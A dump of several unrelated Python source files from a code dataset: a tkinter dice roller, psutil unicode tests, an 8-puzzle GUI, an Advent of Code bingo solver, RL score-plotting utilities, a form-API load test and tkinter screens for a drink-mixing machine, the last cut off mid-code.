tkinter.Button(root, text='Roll the Dice', fg='blue', command=dice_roll)\nbtn.pack( expand=True)\n\n# Mainloop which keeps the window open\nroot.mainloop()","repo_name":"darshil1999/python-project","sub_path":"1/Dice Rolling Simulator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21384065175","text":"import os\nimport shutil\nimport traceback\nimport unittest\nimport warnings\nfrom contextlib import closing\n\nimport psutil\nfrom psutil import BSD\nfrom psutil import POSIX\nfrom psutil import WINDOWS\nfrom psutil._compat import PY3\nfrom psutil._compat import u\nfrom psutil.tests import APPVEYOR\nfrom psutil.tests import ASCII_FS\nfrom psutil.tests import CI_TESTING\nfrom psutil.tests import HAS_CONNECTIONS_UNIX\nfrom psutil.tests import HAS_ENVIRON\nfrom psutil.tests import HAS_MEMORY_MAPS\nfrom psutil.tests import INVALID_UNICODE_SUFFIX\nfrom psutil.tests import PYPY\nfrom psutil.tests import TESTFN_PREFIX\nfrom psutil.tests import UNICODE_SUFFIX\nfrom psutil.tests import PsutilTestCase\nfrom psutil.tests import bind_unix_socket\nfrom psutil.tests import chdir\nfrom psutil.tests import copyload_shared_lib\nfrom psutil.tests import create_exe\nfrom psutil.tests import get_testfn\nfrom psutil.tests import safe_mkdir\nfrom psutil.tests import safe_rmpath\nfrom psutil.tests import serialrun\nfrom psutil.tests import skip_on_access_denied\nfrom psutil.tests import spawn_testproc\nfrom psutil.tests import terminate\n\n\nif APPVEYOR:\n def safe_rmpath(path): # NOQA\n # TODO - this is quite random and I'm not sure why it happens,\n # nor I can reproduce it locally:\n # https://ci.appveyor.com/project/giampaolo/psutil/build/job/\n # jiq2cgd6stsbtn60\n # safe_rmpath() happens after reap_children() so this is weird\n # Perhaps wait_procs() on Windows is broken? Maybe because\n # of STILL_ACTIVE?\n # https://github.com/giampaolo/psutil/blob/\n # 68c7a70728a31d8b8b58f4be6c4c0baa2f449eda/psutil/arch/\n # windows/process_info.c#L146\n from psutil.tests import safe_rmpath as rm\n try:\n return rm(path)\n except WindowsError:\n traceback.print_exc()\n\n\ndef try_unicode(suffix):\n \"\"\"Return True if both the fs and the subprocess module can\n deal with a unicode file name.\n \"\"\"\n sproc = None\n testfn = get_testfn(suffix=suffix)\n try:\n safe_rmpath(testfn)\n create_exe(testfn)\n sproc = spawn_testproc(cmd=[testfn])\n shutil.copyfile(testfn, testfn + '-2')\n safe_rmpath(testfn + '-2')\n except (UnicodeEncodeError, IOError):\n return False\n else:\n return True\n finally:\n if sproc is not None:\n terminate(sproc)\n safe_rmpath(testfn)\n\n\n# ===================================================================\n# FS APIs\n# ===================================================================\n\n\nclass BaseUnicodeTest(PsutilTestCase):\n funky_suffix = None\n\n def setUp(self):\n if self.funky_suffix is not None:\n if not try_unicode(self.funky_suffix):\n raise self.skipTest(\"can't handle unicode str\")\n\n\n@serialrun\n@unittest.skipIf(ASCII_FS, \"ASCII fs\")\n@unittest.skipIf(PYPY and not PY3, \"too much trouble on PYPY2\")\nclass TestFSAPIs(BaseUnicodeTest):\n \"\"\"Test FS APIs with a funky, valid, UTF8 path name.\"\"\"\n\n funky_suffix = UNICODE_SUFFIX\n\n @classmethod\n def setUpClass(cls):\n cls.funky_name = get_testfn(suffix=cls.funky_suffix)\n create_exe(cls.funky_name)\n\n @classmethod\n def tearDownClass(cls):\n safe_rmpath(cls.funky_name)\n\n def expect_exact_path_match(self):\n # Do not expect psutil to correctly handle unicode paths on\n # Python 2 if os.listdir() is not able either.\n here = '.' if isinstance(self.funky_name, str) else u('.')\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n return self.funky_name in os.listdir(here)\n\n # ---\n\n def test_proc_exe(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n p = psutil.Process(subp.pid)\n exe = p.exe()\n self.assertIsInstance(exe, str)\n if self.expect_exact_path_match():\n self.assertEqual(os.path.normcase(exe),\n os.path.normcase(self.funky_name))\n\n def test_proc_name(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n name = psutil.Process(subp.pid).name()\n self.assertIsInstance(name, str)\n if self.expect_exact_path_match():\n self.assertEqual(name, os.path.basename(self.funky_name))\n\n def test_proc_cmdline(self):\n subp = self.spawn_testproc(cmd=[self.funky_name])\n p = psutil.Process(subp.pid)\n cmdline = p.cmdline()\n for part in cmdline:\n self.assertIsInstance(part, str)\n if self.expect_exact_path_match():\n self.assertEqual(cmdline, [self.funky_name])\n\n def test_proc_cwd(self):\n dname = self.funky_name + \"2\"\n self.addCleanup(safe_rmpath, dname)\n safe_mkdir(dname)\n with chdir(dname):\n p = psutil.Process()\n cwd = p.cwd()\n self.assertIsInstance(p.cwd(), str)\n if self.expect_exact_path_match():\n self.assertEqual(cwd, dname)\n\n @unittest.skipIf(PYPY and WINDOWS, \"fails on PYPY + WINDOWS\")\n def test_proc_open_files(self):\n p = psutil.Process()\n start = set(p.open_files())\n with open(self.funky_name, 'rb'):\n new = set(p.open_files())\n path = (new - start).pop().path\n self.assertIsInstance(path, str)\n if BSD and not path:\n # XXX - see https://github.com/giampaolo/psutil/issues/595\n return self.skipTest(\"open_files on BSD is broken\")\n if self.expect_exact_path_match():\n self.assertEqual(os.path.normcase(path),\n os.path.normcase(self.funky_name))\n\n @unittest.skipIf(not POSIX, \"POSIX only\")\n def test_proc_connections(self):\n name = self.get_testfn(suffix=self.funky_suffix)\n try:\n sock = bind_unix_socket(name)\n except UnicodeEncodeError:\n if PY3:\n raise\n else:\n raise unittest.SkipTest(\"not supported\")\n with closing(sock):\n conn = psutil.Process().connections('unix')[0]\n self.assertIsInstance(conn.laddr, str)\n self.assertEqual(conn.laddr, name)\n\n @unittest.skipIf(not POSIX, \"POSIX only\")\n @unittest.skipIf(not HAS_CONNECTIONS_UNIX, \"can't list UNIX sockets\")\n @skip_on_access_denied()\n def test_net_connections(self):\n def find_sock(cons):\n for conn in cons:\n if os.path.basename(conn.laddr).startswith(TESTFN_PREFIX):\n return conn\n raise ValueError(\"connection not found\")\n\n name = self.get_testfn(suffix=self.funky_suffix)\n try:\n sock = bind_unix_socket(name)\n except UnicodeEncodeError:\n if PY3:\n raise\n else:\n raise unittest.SkipTest(\"not supported\")\n with closing(sock):\n cons = psutil.net_connections(kind='unix')\n conn = find_sock(cons)\n self.assertIsInstance(conn.laddr, str)\n self.assertEqual(conn.laddr, name)\n\n def test_disk_usage(self):\n dname = self.funky_name + \"2\"\n self.addCleanup(safe_rmpath, dname)\n safe_mkdir(dname)\n psutil.disk_usage(dname)\n\n @unittest.skipIf(not HAS_MEMORY_MAPS, \"not supported\")\n @unittest.skipIf(not PY3, \"ctypes does not support unicode on PY2\")\n @unittest.skipIf(PYPY, \"unstable on PYPY\")\n def test_memory_maps(self):\n # XXX: on Python 2, using ctypes.CDLL with a unicode path\n # opens a message box which blocks the test run.\n with copyload_shared_lib(suffix=self.funky_suffix) as funky_path:\n def normpath(p):\n return os.path.realpath(os.path.normcase(p))\n libpaths = [normpath(x.path)\n for x in psutil.Process().memory_maps()]\n # ...just to have a clearer msg in case of failure\n libpaths = [x for x in libpaths if TESTFN_PREFIX in x]\n self.assertIn(normpath(funky_path), libpaths)\n for path in libpaths:\n self.assertIsInstance(path, str)\n\n\n@unittest.skipIf(CI_TESTING, \"unreliable on CI\")\nclass TestFSAPIsWithInvalidPath(TestFSAPIs):\n \"\"\"Test FS APIs with a funky, invalid path name.\"\"\"\n\n funky_suffix = INVALID_UNICODE_SUFFIX\n\n def expect_exact_path_match(self):\n # Invalid unicode names are supposed to work on Python 2.\n return True\n\n\n# ===================================================================\n# Non fs APIs\n# ===================================================================\n\n\nclass TestNonFSAPIS(BaseUnicodeTest):\n \"\"\"Unicode tests for non fs-related APIs.\"\"\"\n\n funky_suffix = UNICODE_SUFFIX if PY3 else 'è'\n\n @unittest.skipIf(not HAS_ENVIRON, \"not supported\")\n @unittest.skipIf(PYPY and WINDOWS, \"segfaults on PYPY + WINDOWS\")\n def test_proc_environ(self):\n # Note: differently from others, this test does not deal\n # with fs paths. On Python 2 subprocess module is broken as\n # it's not able to handle with non-ASCII env vars, so\n # we use \"è\", which is part of the extended ASCII table\n # (unicode point <= 255).\n env = os.environ.copy()\n env['FUNNY_ARG'] = self.funky_suffix\n sproc = self.spawn_testproc(env=env)\n p = psutil.Process(sproc.pid)\n env = p.environ()\n for k, v in env.items():\n self.assertIsInstance(k, str)\n self.assertIsInstance(v, str)\n self.assertEqual(env['FUNNY_ARG'], self.funky_suffix)\n\n\nif __name__ == '__main__':\n from psutil.tests.runner import run_from_name\n run_from_name(__file__)\n","repo_name":"giampaolo/psutil","sub_path":"psutil/tests/test_unicode.py","file_name":"test_unicode.py","file_ext":"py","file_size_in_byte":9646,"program_lang":"python","lang":"en","doc_type":"code","stars":9653,"dataset":"github-code","pt":"60"} +{"seq_id":"26613312039","text":"import sys\nif sys.version_info[0] == 3:\n # for Python3\n from tkinter import * ## notice lowercase 't' in tkinter here\nelse:\n # for Python2\n from Tkinter import * ## notice capitalized T in Tkinter\n\n# This is not really part of the assignment\n# I meant to incorporate the search algorithms to let the computer solve the problem\n# At least it helped me visualize the problem\n# repeat - this part does not support the search algorithms, but if youre bored play away\n\nfrom PuzzleBoard import PuzzleBoard\nfrom State import State\nimport numpy as np\n\nclass Main:\n # just a main class\n def __init__(self, master):\n # constructor\n self.canvas_width = 300\n self.canvas_height = 300\n self.rectangles = [0] *8\n self.texts = [0] *8\n\n self.board = PuzzleBoard()\n\n # setting up the tkinter GUI\n self.master = master\n master.title(\"8 Puzzle\")\n master.geometry('640x480')\n\n self.label = Label(master, text=\"This is 8 Puzzle\")\n self.label.pack()\n\n self.score = Label(master, text=self.board.getScore())\n self.score.pack()\n\n self.canvasSpace = Canvas(master, width=self.canvas_width, height=self.canvas_height)\n self.canvasSpace.pack()\n\n self.canvasSpace.create_rectangle(0, 0, 300, 300, fill=\"#696969\")\n self.drawBoard(self.canvasSpace)\n\n self.resetPuzzle_button = Button(master, text=\"Reset Puzzle\", command=self.newPuzzle)\n self.resetPuzzle_button.pack()\n\n self.close_button = Button(master, text=\"Close\", command=master.quit)\n self.close_button.pack()\n\n self.up_button = Button(master, text=\"Up\", command=self.moveUp)\n self.up_button.pack()\n\n self.down_button = Button(master, text=\"Down\", command=self.moveDown)\n self.down_button.pack()\n\n self.left_button = Button(master, text=\"Left\", command=self.moveLeft)\n self.left_button.pack()\n\n self.right_button = Button(master, text=\"Right\", command=self.moveRight)\n self.right_button.pack()\n\n # processing button clicks\n def moveRight(self):\n self.board.moveRight()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveLeft(self):\n self.board.moveLeft()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveDown(self):\n self.board.moveDown()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def moveUp(self):\n self.board.moveUp()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n def newPuzzle(self):\n print('hello')\n self.board.resetPuzzle()\n self.board.resetScore()\n self.score.config(text=self.board.getScore())\n self.drawBoard(self.canvasSpace)\n\n # drawing the board after every click\n def drawBoard(self, canvas):\n for rec in self.rectangles:\n canvas.delete(rec)\n\n for txt in self.texts:\n canvas.delete(txt)\n\n currentState = self.board.getState()\n for i in range(3):\n for j in range(3):\n if currentState[i][j] != 0:\n origin_X = 100*i\n origin_Y = 100*j\n final_X = origin_X+100\n final_Y = origin_Y+100\n self.rectangles.append(canvas.create_rectangle(origin_X, origin_Y, final_X, final_Y, fill=\"#DCDCDC\"))\n self.texts.append(canvas.create_text(origin_X+50,origin_Y+50,text=currentState[i][j]))\n\nroot = Tk()\nmainPanel = Main(root)\nroot.mainloop()\n","repo_name":"reidtc82/8puzzle","sub_path":"ForHumanstoPlay.py","file_name":"ForHumanstoPlay.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9508158941","text":"from carton import Carton\n\nf = open('input','r')\n\nentry = [int(s) for s in f.readline().split(\",\")]\n\nlines = f.readlines()\nt = len(lines)\n\ni = 1\ncards = []\nwhile (i < t):\n data = []\n for j in range(5):\n data.append([int(v) for v in lines[i].split()])\n i += 1\n d = Carton(data)\n cards.append(d)\n i += 1 ## Una linéa en blanco\n\nfor n in entry:\n if (len(cards) == 0):\n exit(0)\n print(\"Probando el número: \" + str(n))\n borrados = []\n for card in cards:\n card.mark(n)\n if (card.check()):\n print(\"Hemos encontrado línea\")\n print(card)\n print(\"Numero: \" + str(n))\n print(card.sum_unmarked() * n)\n borrados.append(card)\n #print(\"Número de tarjetas \" + str(len(cards)))\n #exit(0)\n else:\n print(card)\n print(\"_______________________________________________________________________________________\") \n for b in borrados:\n cards.remove(b)\n","repo_name":"ingjrs01/adventofcode","sub_path":"2021/day04/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17740048609","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport time\n#from .helper import get_constant_string\n# from constants import * # Capital lettered variables are constants from the constants.py file\n\nimport os\n\n\ndef calculate_moving_avarage(scores, num_agent=1, scores_window=100):\n if num_agent < 2: single_agent_returns = np.transpose(np.array(scores))\n else: single_agent_returns = np.transpose(np.array(scores))\n moving_avarages = [np.convolve(single_agent_returns[i], np.ones(scores_window)/scores_window, mode='valid') for i in range(num_agent)]\n\n return moving_avarages\n\n\ndef calculate_max(scores):\n new_scores = scores.copy()\n\n for i, episode_score in enumerate(new_scores):\n new_scores[i] = np.delete(episode_score, np.argmin(episode_score))\n\n return new_scores\n # best_score = []\n\n # for i, episode_score in enumerate(scores):\n # best_score.append(np.max(episode_score))\n\n # return best_score\n\n\ndef render_figure(scores, agents, env_params, name=\"\", scores_window=0, path=\"\", goal=0, save=False, display= True):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n # fig, (ax, tb) = plt.subplots(nrows=1, ncols=2)\n fig = plt.figure()\n\n ax = fig.add_subplot(1, 3, (1, 2))\n tb1 = fig.add_subplot(3, 3, 3)\n tb2 = fig.add_subplot(3, 3, 6)\n tb3 = fig.add_subplot(3, 3, 9)\n\n # --- Plot labels --- #\n for_title, for_filename, for_table, for_id = agents[0].get_title()\n\n\n ax.set_title(for_title)\n ax.set_ylabel('Score')\n ax.set_xlabel('Episode #')\n\n fig.text(0.975, 0.1, for_id, size=7, color='gray', \n horizontalalignment='right',\n verticalalignment='top')\n\n\n\n\n # --- Plot scores --- #\n if len(agents)>1: # multiple agents\n accumulated_by_agent = np.transpose(np.array(scores))\n for i_agent in range(len(agents)):\n ax.plot(np.arange(1, len(accumulated_by_agent[i_agent])+1), accumulated_by_agent[i_agent])\n else: ax.plot(np.arange(1, len(scores)+1), scores)\n\n # --- Plot moving avarages --- #\n best_avg_score = None\n episode_achieved = 0\n final_avarage = 0\n highest = 0\n\n if scores_window > 0:\n moving_avarages = []\n if len(agents)>1: \n moving_avarages = calculate_moving_avarage(scores, len(agents), scores_window=scores_window)\n\n best_of_two = calculate_moving_avarage(calculate_max(scores), 1, scores_window=scores_window)\n\n episode_achieved = np.argmax(best_of_two[0])\n best_avg_score = best_of_two[0][episode_achieved]\n episode_achieved += scores_window\n final_avarage = best_of_two[0][-1]\n highest = max(scores[0])\n\n ax.plot(np.arange(len(best_of_two[0]) + scores_window)[scores_window:], best_of_two[0], 'k-')\n else: \n moving_avarages = calculate_moving_avarage(scores, len(agents), scores_window=scores_window)\n \n episode_achieved = np.argmax(moving_avarages[0])\n best_avg_score = moving_avarages[0][episode_achieved]\n episode_achieved += scores_window\n final_avarage = moving_avarages[0][-1]\n highest = max(scores)\n \n for i_agent in range(len(moving_avarages)):\n ax.plot(np.arange(len(moving_avarages[i_agent]) + scores_window)[scores_window:], moving_avarages[i_agent], 'm-')\n \n if goal > 0.: ax.axhline(y=goal, color='c', linestyle='--')\n\n # --- Plot table --- #\n # for env #\n tb1.axis('tight')\n tb1.axis(\"off\")\n rows = env_params[0]\n columns = ['Env']\n cell_text = env_params[1]\n tb1.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n # for agent #\n tb2.axis('tight')\n tb2.axis(\"off\")\n rows = for_table[0]\n columns = ['Agent']\n cell_text = for_table[1]\n tb2.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n\n # for scores #\n tb3.axis('tight')\n tb3.axis(\"off\")\n rows = [\"best in {}\".format(scores_window), \"ep. achieved\", \"final avg.\", \"highest ep.\"]\n columns = ['Scores']\n cell_text = [['{:.1f}'.format(best_avg_score)], [episode_achieved], ['{:.1f}'.format(final_avarage)], [highest]]\n tb3.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, \n loc='center right')\n\n\n\n fig.tight_layout()\n\n\n # --- Save and Display --- #\n if save: fig.savefig(\"{}{}_figure_{}.jpg\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), bbox_inches='tight')\n if display: fig.show()\n\n\n\n\ndef save_scores(scores, agents, name=\"\", path=\"\"):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n if not os.path.exists(path):\n print(\"Directory doesn't exist, going to create one first\")\n os.makedirs(path)\n\n for_title, for_filename, for_table, for_id = agents[0].get_title()\n\n with open(\"{}{}_scores_{}.csv\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), 'w', newline='') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(scores)\n\n print(\"Scores saved!\")\n\n\ndef read_scores(network_name=''.format(time.strftime(\"%Y-%m-%d_%H%M\")), path=''):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n if os.path.exists(path):\n\n # _, for_filename = get_constant_string()\n\n with open(\"{}{}.csv\".format(path, network_name), newline='') as f:\n reader = csv.reader(f)\n read_score_history = list(reader)[0]\n\n parsed = [float(i) for i in read_score_history]\n\n return parsed\n\ndef save_states(states, name=\"\", path=\"\"):\n if len(path) < 1:\n path = 'experiments/saved/'\n\n with open(\"{}{}_states_{}.csv\".format(path, time.strftime(\"%Y-%m-%d_%H%M%S\"), name), \"w\", newline=\"\") as f:\n writer = csv.writer(f)\n writer.writerows(states)","repo_name":"dream-faster/research-multi-drl","sub_path":"utilities/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":6026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"18394740648","text":"import pyttsx3 as tts\n\n\nclass AudioConverter:\n\n @staticmethod\n def convert_and_save(string: str, save_location: str):\n engine = tts.init()\n engine.setProperty(\"rate\", 150)\n engine.save_to_file(string, save_location)\n engine.runAndWait()\n","repo_name":"ArunaAcharya/PDFtoAudioConverter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"9842883710","text":"import common\nimport unittest\nimport time\n\nGATEWAY_URL = \"http://localhost/v0\"\n\n\ndef timeit(name, itr):\n \"\"\"Return a function decorator that prints the time\n taken for execution, with a given name\n\n Args:\n name (str): test/method name\n \"\"\"\n def decor(f):\n def inner(*args, **kwargs):\n t_start = time.perf_counter()\n f(*args, **kwargs)\n elapsed = time.perf_counter() - t_start\n print(f\"{name} executed in {elapsed} seconds | N={itr} | {elapsed / itr} per iteration\")\n return inner\n return decor\n\nclass TestLoad(unittest.TestCase):\n \n def test_signup(self):\n N = 100\n users = [common.generate_user() for _ in range(N)]\n\n @timeit(f\"test_signup\", N)\n def run():\n for u in users:\n common.make_user(GATEWAY_URL, u)\n run()\n\n def test_login(self):\n N = 100\n user = common.generate_user()\n common.make_user(GATEWAY_URL, user)\n\n creds = {\"email\": user[\"email\"], \"password\": user[\"password\"]}\n\n @timeit(f\"test_login\", N)\n def run():\n for _ in range(N):\n common.login(GATEWAY_URL, creds)\n run()\n\n def test_get_form_client(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n\n N = 100\n\n @timeit(f\"test_get_form_client\", N)\n def run():\n for _ in range(N):\n common.get_form_client(GATEWAY_URL, form[\"id\"])\n run()\n\n def test_get_responses(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n form2 = common.make_form(GATEWAY_URL, auth, common.generate_form())\n form3 = common.make_form(GATEWAY_URL, auth, common.generate_form())\n\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form2[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form2[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form3[\"id\"], common.generate_form())\n common.post_form_user(GATEWAY_URL, form3[\"id\"], common.generate_form())\n\n\n N = 100\n\n @timeit(f\"test_get_responses\", N)\n def run():\n for _ in range(N):\n common.get_responses(GATEWAY_URL, auth)\n run()\n\n def test_patch_response(self):\n\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_form())\n\n resp = common.get_responses_params(GATEWAY_URL, auth, {\"formID\": form[\"id\"]})[0]\n\n N = 100\n\n @timeit(f\"test_patch_response\", N)\n def run():\n new_state = False\n for _ in range(N):\n common.patch_response(GATEWAY_URL, auth, resp[\"id\"], new_state)\n new_state = not new_state\n run()\n\n def test_create_tag(self):\n auth = common.make_user(GATEWAY_URL, common.generate_user())\n form = common.make_form(GATEWAY_URL, auth, common.generate_form())\n common.post_form_user(GATEWAY_URL, form[\"id\"], common.generate_response())\n resp = common.get_responses_params(GATEWAY_URL, auth, {\"formID\": form[\"id\"]})[0]\n N = 100\n\n tag_vals = [f\"test_{i}\" for i in range(N)]\n\n @timeit(\"test_create_tag\", N)\n def run():\n for i in range(N):\n common.make_tag(GATEWAY_URL, auth, resp[\"id\"], tag_vals[i])\n\n run()\n\n\n def test_mailto(self):\n body = {\n \"to\": [\"test@example.com\"],\n \"subject\": \"test subject\",\n \"body\": \"test body\"\n }\n\n N = 100\n\n @timeit(f\"test_mailto\", N)\n def run():\n for _ in range(N):\n common.post_mailto(GATEWAY_URL, body)\n\n run()\n\n\n\n\n\n \n\nif __name__ == '__main__':\n unittest.main()","repo_name":"vinh-hua/civic-qa","sub_path":"test/e2e/load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"34526011594","text":"while True:\n try:\n height = int(input(\"Height: \"))\n if height > 0 and height < 9:\n break\n except ValueError:\n continue\n\n\nfor i in range(1, height+1):\n for j in range(height - i):\n print(\" \", end=\"\")\n print(\"#\"*i)\n ","repo_name":"JyyHuang/CIS1051","sub_path":"Lab6/mario-less-comfortable.py","file_name":"mario-less-comfortable.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10749454057","text":"from tkinter import *\nfrom tkinter import ttk\nfrom PIL import Image,ImageTk\n\nclass Cupselection(ttk.Frame):\n\n def __init__(self, parent, beverage, **options):\n super().__init__(parent, **options)\n self.init_content(beverage)\n\n def init_content(self, beverage):\n ttk.Style().configure('cupselection.top.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.big.TLabel', background=\"#201F1E\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.small.TLabel', background=\"#201F1E\", font=\"Helvetica 15\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('cupselection.center.TFrame', background=\"#201F1E\")\n ttk.Style().configure('cupselection.top.TFrame', background=\"#871352\")\n topframe = ttk.Frame(self, height=120, width=800, style=\"cupselection.top.TFrame\")\n topframe.pack(side=TOP, expand=YES, fill=BOTH)\n ttk.Label(topframe, text=\"Bitte Wähle eine Größe aus\", style=\"cupselection.top.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n centerframe = CupselectionCenter(self, beverage, height=280, width=800, style=\"cupselection.center.TFrame\")\n centerframe.pack(side=BOTTOM, expand=YES, fill=BOTH)\n self.centerframe = centerframe\n\n\nclass CupselectionCenter(ttk.Frame):\n def __init__(self, parent, beverage, **options):\n super().__init__(parent, **options)\n self.profilesframes = []\n self.init_content(beverage)\n\n def init_content(self, beverage):\n #Todo calc ratio\n sizes = beverage.caclsiszes()\n index = 0\n for type, size in sizes.items():\n ttk.Style().configure('cupselection.center.cupsize.TFrame', background=\"#201F1E\")\n frame = CupselectionProfile(self,size=size, type=type, width=160, height=200, style='cupselection.center.cupsize.TFrame')\n frame.grid_propagate(0)\n frame.grid(column=index, row=0)\n Grid.columnconfigure(self, index, weight=1)\n Grid.rowconfigure(self, 0, weight=1)\n index += 1\n self.profilesframes.append(frame)\n\n\nclass CupselectionProfile(ttk.Frame):\n def __init__(self, parent, size, type, **options):\n super().__init__(parent, **options)\n self.size = size\n self.init_content(size, type)\n\n def init_content(self, size, type):\n canvas = Canvas(self,width=160, height=100, bg=\"#201F1E\", bd=0, highlightthickness=0, relief='ridge')\n image = Image.open(\"images/cup.png\")\n if type == \"Small\":\n image = image.resize((60, 60), Image.ANTIALIAS)\n if type == \"Medium\":\n image = image.resize((80, 80), Image.ANTIALIAS)\n if type == \"Big\":\n image = image.resize((100, 100), Image.ANTIALIAS)\n self.gif1 = ImageTk.PhotoImage(image)\n canvas.create_image(80, 100, image=self.gif1, anchor=S)\n canvas.grid(row=0, sticky=\"nsew\", pady=(10, 10))\n label = ttk.Label(self, text=type, style=\"cupselection.big.TLabel\")\n label.grid(row=1, sticky=\"nsew\", pady=(10, 10))\n label = ttk.Label(self, text=\"(\"+str(size)+\"ml\"+\")\" , style=\"cupselection.small.TLabel\",)\n label.grid(row=2, padx=(10, 10))\n\n\nclass ProgressBar(ttk.Frame):\n\n def __init__(self, parent, beverage,cupsize, **options):\n super().__init__(parent, **options)\n\n def init_content(self, beverage,cupsize):\n ttk.Style().configure('progressbar.big.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.small.TLabel', background=\"#871352\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.TLabel', background=\"#201F1E\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('progressbar.top.TFrame', background=\"#871352\")\n ttk.Style().configure('progressbar.bottom.TFrame', background=\"#201F1E\")\n topframe = ttk.Frame(self, height=200, width=800, style=\"progressbar.top.TFrame\")\n if beverage and cupsize:\n ttk.Label(topframe, text=\"Dein Getränk wird gerade gemixt\", style=\"progressbar.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n else:\n ttk.Label(topframe, text=\"Dein BarMan wird gerade gereinigt\", style=\"progressbar.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n\n ttk.Label(topframe, text=\"gleich ist es soweit :)\", style=\"progressbar.small.TLabel\").pack(side=BOTTOM,\n expand=YES,\n fill=BOTH)\n\n topframe.pack(side=TOP,expand=YES, fill=BOTH)\n bottomframe = ttk.Frame(self, height=200, width=800,style=\"progressbar.bottom.TFrame\")\n bottomframe.pack(side=BOTTOM, expand=YES, fill=BOTH)\n if beverage and cupsize:\n ttk.Label(bottomframe, text=\"Dein Getränk: \" + beverage.name +\", \"+str(cupsize)+\"ml\", style=\"progressbar.TLabel\").place(x=400, y=170,\n anchor=\"center\")\n TROUGH_COLOR = '#201F1E'\n BAR_COLOR = '#871352'\n ttk.Style().configure(\"bar.Horizontal.TProgressbar\", troughcolor=TROUGH_COLOR, bordercolor=TROUGH_COLOR,\n background=BAR_COLOR, lightcolor=BAR_COLOR, darkcolor=BAR_COLOR)\n self.progressbar = ttk.Progressbar(bottomframe, style=\"bar.Horizontal.TProgressbar\", orient=\"horizontal\", length=600,\n mode=\"determinate\")\n self.progressbar.place(x=400, y=100, anchor=\"center\")\n\n def setprogress(self, value):\n self.progressbar[\"value\"] = int(value)\n\nclass DrinkFinished(ttk.Frame):\n def __init__(self, parent, beverage, **options):\n super().__init__(parent, **options)\n self.__init_content(beverage)\n\n def __init_content(self, beverage):\n ttk.Style().configure('drinkfinished.big.TLabel', background=\"#871352\", font=\"Helvetica 35\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.small.TLabel', background=\"#871352\", font=\"Helvetica 20\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.TLabel', background=\"#201F1E\", font=\"Helvetica 30\",\n foreground=\"white\", justify=\"center\", anchor=\"center\")\n ttk.Style().configure('drinkfinished.top.TFrame', background=\"#871352\")\n topframe = ttk.Frame(self, height=200, width=800, style=\"drinkfinished.top.TFrame\")\n\n if beverage:\n ttk.Label(topframe, text=\"Dein Getränk ist fertig!\", style=\"drinkfinished.big.TLabel\").pack(side=TOP,\n expand=YES,\n fill=BOTH)\n topframe.pack(side=TOP, expand=YES, 